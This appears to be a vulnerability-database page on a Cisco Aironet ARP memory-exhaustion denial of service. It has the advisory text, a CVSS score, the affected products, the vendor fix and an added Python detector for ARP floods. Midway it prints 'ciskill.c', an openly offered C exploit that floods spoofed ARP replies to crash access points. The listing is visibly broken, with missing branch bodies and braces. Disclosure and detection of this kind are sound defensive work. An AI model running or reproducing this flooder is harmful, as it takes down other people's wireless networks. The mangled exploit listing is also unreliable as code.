Published: 2006-01-22 15:03:00
Revised: 2011-03-07 21:29:50

[Original] Cisco IOS before 12.3-7-JA2 on Aironet Wireless Access Points (WAP) allows remote authenticated users to cause a denial of service (termination of packet passing or termination of client connections) by sending the management interface a large number of spoofed ARP packets, which creates a large ARP table that exhausts memory, aka Bug ID CSCsc16644.

[CNNVD] Cisco Aironet Wireless Access Point ARP Attack Denial of Service Vulnerability (CNNVD-200601-286)

        Cisco Aironet wireless access points (APs) are widely deployed wireless network access devices.
        Cisco Aironet APs have a flaw in how they handle ARP requests; a remote attacker may exploit it to mount a denial-of-service attack against the device. An attacker who can successfully associate with a Cisco IOS wireless access point can spoof ARP messages to the access point's management interface. The attacker can keep adding entries to the device's ARP table until physical memory is completely exhausted. This leaves the device unable to pass traffic until it is power-cycled and reloaded, affecting the availability of the wireless access point; both the management and the packet-forwarding services may become unusable.

- CVSS (Base Score)

CVSS score: 5.5 [MEDIUM]
Confidentiality impact: NONE [no impact on system confidentiality]
Integrity impact: NONE [no impact on system integrity]
Availability impact: COMPLETE [may cause a complete system outage]
Attack complexity: LOW [exploitation has no access restrictions]

- CWE (Weakness Category)

CWE-399 [Resource Management Errors]

- CPE (Affected Platforms and Products)

cpe:/h:cisco:aironet_ap1230ag    Cisco Aironet 1230AG
cpe:/h:cisco:aironet_ap1400      Cisco Aironet 1400
cpe:/h:cisco:aironet_ap350       Cisco Aironet 350 IOS
cpe:/h:cisco:aironet_ap1300      Cisco Aironet 1300
cpe:/h:cisco:aironet_ap1200      Cisco Aironet 1200
cpe:/h:cisco:aironet_ap1240ag    Cisco Aironet 1240AG
cpe:/h:cisco:aironet_ap1130ag    Cisco Aironet 1130AG
cpe:/h:cisco:aironet_ap1100      Cisco Aironet 1100

- OVAL (Technical Details for Detection)

oval:org.mitre.oval:def:5680    Cisco Aironet Access Point ARP Memory Exhaustion DoS Vulnerability

- Official Database Links
(official data source) MITRE
(official data source) NVD
(official data source) CNNVD

- Other Links and Resources
(PATCH)  SECTRACK  1015483
(UNKNOWN)  XF  cisco-aironet-arp-dos(24086)
(UNKNOWN)  VUPEN  ADV-2006-0176
(UNKNOWN)  BID  16217
(VENDOR_ADVISORY)  CISCO  20060112 Access Point Memory Exhaustion from ARP Attacks

- Vulnerability Information

Cisco Aironet Wireless Access Point ARP Attack Denial of Service Vulnerability
Medium risk    Resource Management Errors
2006-01-22 00:00:00    2009-03-04 00:00:00

- Advisories and Patches


- Vulnerability Information (1447)

Cisco Aironet Wireless Access Points Memory Exhaustion ARP Attack DoS (EDBID:1447)
hardware dos
2006-01-25 Verified
0 Pasv
N/A
// Cisco Killer - ciskill.c
// Usage: ./ciskill [device]
// Author: Pasv (pasvninja [at]
// Credit: This exploit takes advantage of a vulnerability that was
// discovered by Eric Smith on January 12, 2006 (bid:16217)
// Greets to NW, zimmy, GSO, and the rest.
// Description: The vulnerability exists in the way the affected versions
// below handle ARP replies, if enough specially crafted ARP packets are sent
// on the network with the affected systems it will cause the access point memory
// exhaustion which will in a few seconds (depending on the speed of the attacker
// and the memory of the target) crash the system, making all ingoing/outgoing
// traffic stopped.
// Disclaimer: I pity the foo who uses this exploit for evil, I take no responsibility
// for your actions (like a knife maker).
// Versions affected:
//  Cisco Aironet 350 IOS
//  Cisco Aironet 1400
//  Cisco Aironet 1300
//  Cisco Aironet 1240AG
//  Cisco Aironet 1230AG
//  Cisco Aironet 1200
//  Cisco Aironet 1130AG
//  Cisco Aironet 1100
// (this includes most linksys wireless access points)

#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <net/if.h>
#include <netinet/in.h>
#include <linux/if_ether.h>
#include <linux/sockios.h>

// Edit this packet accordingly if the target is picky
char pkt[]=
// Ethernet header
"\xff\xff\xff\xff\xff\xff" 	// Destination: broadcast
"AAAAAA"			// Source: 41:41:41:41:41:41
"\x08\x06"			// Pkt type: ARP
// ARP header
"\x00\x01"			// Hardware type: Ethernet
"\x08\x00"			// Protocol: IP
"\x06"				// Hardware size: 6
"\x04"				// Protocol size: 4
"\x00\x02"			// Opcode: Reply
"AAAAAA"			// Sender (Mac): 41:41:41:41:41:41
"AAAA"				// Sender (IP):
"AAAAAA"			// Target (mac): 41:41:41:41:41:41
"AAAA"				// Target (IP):
; // End of Packet

int main(int argc, char **argv) {
	FILE *fp;
	int sock, seed;
	long count;
	char *device;
	in_addr_t addr;
	struct sockaddr sin;
	printf("CisKill -- Aironet Cisco Killer\nCoded by: Pasv\nDiscovery credit: Eric Smith\n");
	if(getuid()) {
		printf("Must be root to inject arp packets!\n");
	if(argc != 2) {
	else {

	fp = fopen("/dev/urandom", "r");
	fscanf(fp,"%d", &seed);
	memset(&sin, 0, sizeof(sin));
	sin.sa_family = AF_UNSPEC;
	strncpy(sin.sa_data,device, 14);
	sock = socket(PF_INET, SOCK_PACKET, 0x300);
	printf("Using device: %s\n\n", device);	
	// stupid
	printf("Press ctrl+c immediately if you wish to stop\nGoing in 5\n");
	sleep(1);printf(" 4\n");sleep(1);printf(" 3\n");sleep(1);printf(" 2\n");sleep(1);printf(" 1!\n");sleep(1);
	while(1) {
		addr = (rand()%0xff)+(rand()%0xff)+(rand()%0xff)+(rand()%0xff);
		pkt[28] = (char)addr;
		pkt[38] = (char)addr;
		printf("#:%ld bytes sent: %d (should be 42)\n",count,  sendto(sock, pkt, 42, 0, (struct sockaddr *)&sin, sizeof(sin)));

// [2006-01-25]

- Vulnerability Information

Cisco Aironet Access Point ARP Memory Exhaustion DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public, Exploit Unknown

- Vulnerability Description

Cisco Aironet Access Points contain a flaw that may allow a remote denial of service. The issue is triggered when an attacker sends many spoofed ARP messages to the management interface of the AP, adding entries to the ARP table until memory is exhausted, which results in loss of availability for the AP until it is restarted.
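The mechanism described above, one new ARP-table entry per spoofed message until memory is gone, leaves a recognisable trace on the segment: a single source advertising a stream of different sender IP addresses. The following Python script is an added example written for this page, not code from CNNVD, the Cisco advisory or the exploit listing above. It decodes ARP frames in the 42-byte Ethernet/ARP layout shown in that listing, counts how many distinct sender IPs each source advertises inside a sliding time window (and how many distinct sender MAC/IP pairs appear overall), and returns an alert when a count exceeds a threshold. The thresholds (50 per source, 500 overall, 10 s window), the 192.168.1.1 management address and the client MAC addresses are constructed sample values, not figures from the record.

```python
"""ARP-table growth detector (added example; not part of the CNNVD record or the
exploit above). Flags a source that advertises many distinct sender IPs in a
short window, the pattern that inflates an AP's ARP table until memory runs out."""
import struct
from collections import defaultdict

ETH_HDR = struct.Struct("!6s6sH")           # dst MAC, src MAC, EtherType
ARP_HDR = struct.Struct("!HHBBH6s4s6s4s")   # htype, ptype, hlen, plen, op, sha, spa, tha, tpa
ETHERTYPE_ARP = 0x0806
ARP_REPLY = 2


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def ip_str(raw):
    return ".".join(str(b) for b in raw)


def parse_arp(frame):
    """Decode an Ethernet/ARP frame in the 42-byte layout shown in the record above.
    Returns a dict of fields, or None for anything that is not IPv4-over-Ethernet ARP."""
    if len(frame) < ETH_HDR.size + ARP_HDR.size:
        return None
    _dst, src, ethertype = ETH_HDR.unpack_from(frame, 0)
    if ethertype != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, op, sha, spa, tha, tpa = ARP_HDR.unpack_from(frame, ETH_HDR.size)
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {"src_mac": mac_str(src), "op": op, "sha": mac_str(sha), "spa": ip_str(spa),
            "tha": mac_str(tha), "tpa": ip_str(tpa)}


class ArpTableGrowthDetector:
    """Counts distinct sender IPs per Ethernet source, and distinct (sender MAC, sender IP)
    pairs overall, inside a sliding time window. Each new pair is one more ARP-table entry
    the receiving device has to store."""

    def __init__(self, window_s=10.0, max_ips_per_source=50, max_new_entries=500):
        self.window_s = window_s                    # constructed defaults; tune per segment
        self.max_ips_per_source = max_ips_per_source
        self.max_new_entries = max_new_entries
        self.per_source = defaultdict(dict)         # src MAC -> {sender IP: first-seen ts}
        self.entries = {}                           # (sender MAC, sender IP) -> first-seen ts

    def _expire(self, table, now):
        # Drop entries older than the window so slow, legitimate traffic never accumulates.
        for key in [k for k, t in table.items() if now - t > self.window_s]:
            del table[key]

    def observe(self, frame, now):
        """Feed one frame with its capture timestamp; return an alert string or None."""
        arp = parse_arp(frame)
        if arp is None:
            return None
        ips = self.per_source[arp["src_mac"]]
        self._expire(ips, now)
        self._expire(self.entries, now)
        ips.setdefault(arp["spa"], now)
        self.entries.setdefault((arp["sha"], arp["spa"]), now)
        if len(ips) > self.max_ips_per_source:
            return (f"ARP flood from {arp['src_mac']}: {len(ips)} distinct sender IPs "
                    f"within {self.window_s:g}s")
        if len(self.entries) > self.max_new_entries:
            return (f"ARP table growth: {len(self.entries)} new (MAC, IP) entries "
                    f"within {self.window_s:g}s across all sources")
        return None


def sample_frame(src_mac, sender_ip, op=ARP_REPLY):
    """Constructed sample frame (not captured traffic) in the same layout the record shows."""
    spa = bytes(int(o) for o in sender_ip.split("."))
    tpa = bytes([192, 168, 1, 1])               # constructed AP management address
    return (ETH_HDR.pack(b"\xff" * 6, src_mac, ETHERTYPE_ARP)
            + ARP_HDR.pack(1, 0x0800, 6, 4, op, src_mac, spa, b"\x00" * 6, tpa))


def run_demo():
    """Benign re-announcements stay quiet; a source cycling sender IPs trips the per-source rule."""
    det = ArpTableGrowthDetector(window_s=10.0, max_ips_per_source=50)
    alerts = []
    host = bytes.fromhex("001122334455")        # constructed legitimate client
    for i in range(200):                        # 200 replies, always the same address
        a = det.observe(sample_frame(host, "192.168.1.20"), now=i * 0.05)
        if a:
            alerts.append(a)
    noisy = bytes.fromhex("0a0b0c0d0e0f")       # constructed source cycling sender IPs
    for i in range(60):                         # 60 replies, each with a fresh sender IP
        a = det.observe(sample_frame(noisy, f"10.0.{i // 256}.{i % 256}"), now=20 + i * 0.01)
        if a:
            alerts.append(a)
    return alerts


if __name__ == "__main__":
    for line in run_demo():
        print(line)
```

Run the file directly to see the ten alerts the demo produces, or call observe() with frames and timestamps from a live capture on the wired side of the AP or a monitoring port. Keying on the Ethernet source MAC matches the pattern in the record, where one associated station advertises ever-changing sender IPs; the overall (sender MAC, sender IP) counter is the fallback when per-source counts stay low. The thresholds need tuning to the segment: a network where many clients announce addresses at the same time (boot storms, DHCP renewals) needs a higher window total than a quiet management VLAN.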

- Timeline

2006-01-12 Unknown
Unknown Unknown

- Solution

Upgrade to IOS version 12.3-7-JA2 or higher, as it has been reported to fix this vulnerability. In addition to the software upgrade, a configuration change is necessary: add the command L2-FILTER BLOCK-ARP to each radio interface. It is also possible to correct the flaw by implementing the following workaround(s): Use VLANs to isolate wireless clients from the Access Point (AP) management interface.

- Related References

- Vulnerability Author